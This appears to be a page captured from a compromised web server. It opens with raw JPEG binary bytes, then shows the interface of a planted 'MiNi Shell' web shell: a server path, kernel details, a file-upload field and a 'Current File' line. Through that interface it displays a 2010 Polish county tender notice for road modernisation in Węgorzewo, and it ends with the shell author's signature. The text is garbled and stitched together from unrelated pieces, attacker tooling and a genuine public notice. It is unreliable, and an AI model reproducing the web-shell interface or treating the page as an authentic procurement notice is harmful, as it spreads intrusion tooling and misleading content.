JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/211075-N-2010.html

<p class="kh_header"><b>Węgorzewo: Modernizacja dróg powiatowych nr 1754N, 4323N i 4348N w powiązaniu z budową dróg gminnych wraz z towarzysząca infrastrukturą drogową w mieście Węgorzewo.</b><br>
<b>Numer ogłoszenia: 211075 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Węgorzewie , ul. 3 Maja 17B, 11-600 Węgorzewo, woj. warmińsko-mazurskie, tel. 087 4270960, 4270962, faks 087 4270961.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatwegorzewski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja dróg powiatowych nr 1754N, 4323N i 4348N w powiązaniu z budową dróg gminnych wraz z towarzysząca infrastrukturą drogową w mieście Węgorzewo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane w ramach inwestycji pn. Modernizacja dróg powiatowych  nr 1754N, 4323N, 4348N w powiązaniu z budową dróg gminnych wraz z towarzyszącą infrastrukturą drogową w mieście Węgorzewo. Robotami budowlanymi objęte będą ulice: Towarowa, Przemysłowa, Reymonta (w granicach administracyjnych miasta), Krótka. W ramach inwestycji zostaną osiągnięte wskaźniki produktu: 
- zrekonstruowane drogi powiatowe - 1,70 km
- wybudowane - przebudowane chodniki - 2,10 km
- wybudowane - przebudowane skrzyżowania - 4 szt. 
- wybudowane - przebudowane przejścia dla pieszych - 9 szt. 
- wybudowane - przebudowane punkty oświetleniowe - 35 szt. 
- wybudowana - przebudowana sieć kanalizacji deszczowej - 1,28 km 
- wybudowane - przebudowane obiekty infrastruktury ochrony środowiska ( studnie rewizyjne na kanale deszczowym, studzienki betonowe) - 106 szt. 
2.Modernizacja dróg polegać będzie na uregulowaniu szerokości jezdni do 6 m z wykonaniem odpowiednich poszerzeń na poziomych łukach kołowych, wykonaniu parkingów przyległych do jezdni, budowie ciągów pieszych o szer. 2m (z miejscowymi przewężeniami ), wzmocnieniu istniejącej nawierzchni do nośności 80kN - oś, przebudowie i budowie zjazdów do posesji, uregulowaniu odwodnienia, budowie kanalizacji deszczowej,  (UWAGA: należy uwzględnić i wykonać zgodnie ze szczegółem rysunkowym stanowiącym załącznik do niniejszej SIWZ,  ocieplenie Wylot - Separator), przebudowie - budowie oświetlenia ulicznego z pominięciem wykonanego pierwszego etapu, czyli oświetlenie przy ul. Przemysłowej. 
3.Zamawiający dzieli inwestycję na dwa umowne etapy;  wymaga się, aby  w roku 2010 wykonawca wykonał kanalizację deszczową tj. przynajmniej w części niezbędnej ze względu na prace budowlane wykonywane przez Gminę Węgorzewo na nowobudowanych gminnych drogach w ramach miejskiej części inwestycji (zaleca się, aby wykonawca, w celu organizacyjnym,  orientacyjnie zapoznał się z inwestycją gminną), natomiast pozostałe roboty należy wykonać do dnia 30.08.2011 r.
4.Szczegółowy zakres robót zawarty jest w dokumentacji projektowej będącej integralną częścią SIWZ.
5.Użyte w projekcie, opisach czy rysunkach materiały i urządzenia o nazwach handlowych tam zawartych nie są obowiązujące, są podane przykładowo i określają jedynie minimalne oczekiwania, parametry jakościowe i wymagany standard. Zamawiający dopuszcza składanie ofert z użyciem materiałów i urządzeń równoważnych  w stosunku do zaprojektowanych, z zachowaniem standardów technologicznych niezbędnych do prawidłowego funkcjonowania kanalizacji deszczowej. Obowiązek udowodnienia równoważności, zgodnie z art. 30 ust. 5 ustawy, należy do Wykonawcy.
6.Zaleca się dokonania wizji w terenie objętym robotami budowlanymi.
7.Wszystkie prace winny być realizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż. zgodnie z poleceniami inspektora nadzoru. 
8.Użyte materiały i urządzenia winny posiadać odpowiednie dopuszczenia do stosowania w budownictwie i zapewniające sprawność eksploatacyjną. Wykonawca będzie zobowiązany dostarczyć Inspektorowi Nadzoru deklaracje zgodności na użyte materiały z wymaganymi załącznikami przed ich wbudowaniem. 
9.Wszelkie zdemontowane urządzenia oraz cały urobek należy dostarczyć do Zarządu Dróg Powiatowych w Ogonkach, Ogonki 6, 11-600 Węgorzewo.
10.Wykonawca jest zobowiązany do zapewnienia w trakcie realizacji robót dojazdu do posesji zlokalizowanych w obrębie budowy.
11.Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz termin wykonania zamówienia. Wymagana jest należyta staranność przy realizacji zamówienia.
12.Najpóźniej w dniu podpisania umowy, wykonawca przedłoży Zamawiającemu  sporządzony przez siebie harmonogram rzeczowo - terminowo - finansowy, z uwzględnieniem Rozdziału III pkt 4 niniejszej SIWZ.  Zamawiający preferuje  następującą konstrukcję harmonogramu: 
a) część rzeczowo - terminowa: dwudzielny podział na umowne etapy, tj. kanalizację deszczową i pozostałą część inwestycji 
b) część finansowa: dwudzielny podział na rok 2010 (po wykonaniu kanalizacji deszczowej) i na rok 2011 (po wykonaniu pozostałej części inwestycji). 
Wykonawca może nieco szczegółowiej rozbić część rzeczowo - terminową w roku 2011, by Zamawiający mógł posiąść orientacyjną wiedzę o postępie robót budowlanych. 
Zamawiający zastrzega sobie prawo do modyfikowania harmonogramu w porozumieniu z wykonawcą oraz dopuszcza możliwość wprowadzania zmian w harmonogramie przez wykonawcę, po uprzedniej akceptacji Zamawiającego. 
13.Realizacja robót winna być prowadzona zgodnie z umową, Specyfikacją Istotnych Warunków Zamówienia, dokumentacją projektową będącą załącznikiem do SIWZ, obowiązującymi przepisami, polskimi normami, zasadami wiedzy technicznej, oraz harmonogramem rzeczowo - terminowo - finansowym. Nadto roboty winne być realizowane z należytą starannością, z zachowaniem zasad bezpieczeństwa i właściwej organizacji, celem osiągnięcia najlepszej jakości w końcowym rezultacie.
14.Niniejszy projekt jest współfinansowany w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 (konkurs 01-08-5.2.1, Poddziałanie 5.2.1 Infrastruktura drogowa warunkująca rozwój lokalny), ze środków Europejskiego Funduszu Rozwoju Regionalnego (Unia Europejska) oraz budżetu Powiatu węgorzewskiego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.23-8, 45.23.32.20-7, 45.23.31.20-6, 45.23.31.42-6, 45.31.61.10-9, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek wiedzy i doświadczenia, jeżeli wykaże że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert wykonał conajmniej dwie roboty budowlane o wartości co najmniej 1.500,00 PLN każda, odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot niniejszego zamówienia - tzn. roboty podobne; za roboty podobne Zamawiający uzna roboty polegające na budowie, przebudowie, modernizacji dróg, ulic, wraz z wykonaniem takich elementów infrastruktury drogowej jak kanalizacja burzowa, sanitarna, oświetlenie, łącznie bądź wybiórczo.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania odpowiednim potencjałem technicznym, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykaże że dysponuje osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w następujących specjalnościach:  
a) instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
b) drogowej 
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
osoby te muszą posiadać aktualne zaświadczenie z Okręgowej Izby Inżynierów Budownictwa potwierdzające posiadanie danych uprawnień. Wykonawca może dysponować jedną osobą posiadającą uprawnienia we wszystkich trzech specjalnościach bądź dwiema, z których jedna posiada uprawnienia z zakresu dwóch specjalności, tak aby łącznie osoby, którymi dysponuje wykonawca, posiadały uprawnienia we wszystkich trzech specjalnościach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na kwotę nie mniejszą niż 500.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz oferty - druk nr 3 do SIWZ;
2. Pełnomocnictwo osoby podpisującej ofertę do podejmowania takiego zobowiązania w imieniu firmy składającej ofertę, o ile nie wynika to ze złożonych dokumentów.
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Podmioty zagraniczne, zamiast zaświadczenia z Okręgowej Izby Inżynierów Budownictwa składają dokument równoważny, wystawiany w ich kraju.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie: 
1.1 Zmniejszenia zakresu przedmiotu zamówienia i wynagrodzenia pod warunkiem, że z niemożliwych do przewidzenia na etapie planowania inwestycji okoliczności wykonawca nie wykona pewnego zakresu robót i nie wpłynie to na jakość przedmiotu umowy. 
1.2 Zmiany terminu przewidzianego na zakończenie robót, spowodowanych: 
a) wstrzymaniem realizacji robót z przyczyn leżących po stronie Zamawiającego,
 b) działaniem siły wyższej mającej bezpośredni wpływ na terminowość wykonania robót lub innymi przeszkodami lub utrudnieniami w wykonywaniu przedmiotu umowy spowodowanymi przez osoby trzecie, 
c) warunkami atmosferycznymi uniemożliwiającymi realizację robót np. długotrwałymi intensywnymi opadami deszczu, falą gwałtownych upałów i tym podobnymi  czynnikami uniemożliwiającymi terminową realizację robót.
d) koniecznością wprowadzenia zmian w dokumentacji projektowej,
1.3 Zmiany osoby odpowiedzialnej za kierowanie robotami budowlanymi.
2. Nadto, Zamawiający przewiduje możliwość dokonywania zmian w umowie w sytuacji, gdy:
2.1 zmiany te są korzystne dla Zamawiającego;
2.2 jakieś zdarzenie bądź ciąg zdarzeń obiektywnie niezależnych od Zamawiającego lub wykonawcy (których Zamawiający i wykonawca nie mogli przewidzieć i którym nie mogli zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działania z należytą starannością) zasadniczo utrudni wykonanie części zobowiązań umowy, bądź wpłynie na brzmienie zapisów w umowie.   
3. Wszystkie okoliczności, o których mowa powyżej, muszą być stwierdzone protokolarnie, zatwierdzone przez Inspektora Nadzoru. Do wprowadzenia wszelkich zmian wymagana jest pisemna zgoda Zamawiającego. Na okoliczność zmiany umowy zostanie sporządzony aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_wegorzewski/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Węgorzewie, ul. 3-go Maja 17B, 11-600 Węgorzewo, pokoj nr 27..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2010 godzina 09:00, miejsce: Starostwo Powiatowe w Węgorzewie, ul. 3-go Maja 17B, 11-600 Węgorzewo, SEKRETARIAT..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Niniejszy projekt jest współfinansowany w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 (konkurs 01/08/5.2.1, Poddziałanie 5.2.1 Infrastruktura drogowa warunkująca rozwój lokalny), ze środków Europejskiego Funduszu Rozwoju Regionalnego (Unia Europejska) oraz budżetu Powiatu węgorzewskiego
2. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
3. Zamawiający nie dopuszcza rozliczeń w walutach obcych.
4. Integralną część SIWZ stanowią: 
- dokumentacja projektowa, przedmiary robót, szczegół rysunkowy (załącznik nr I) 
-  projekt umowy (załącznik nr. II). 
-  druki 1-5.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com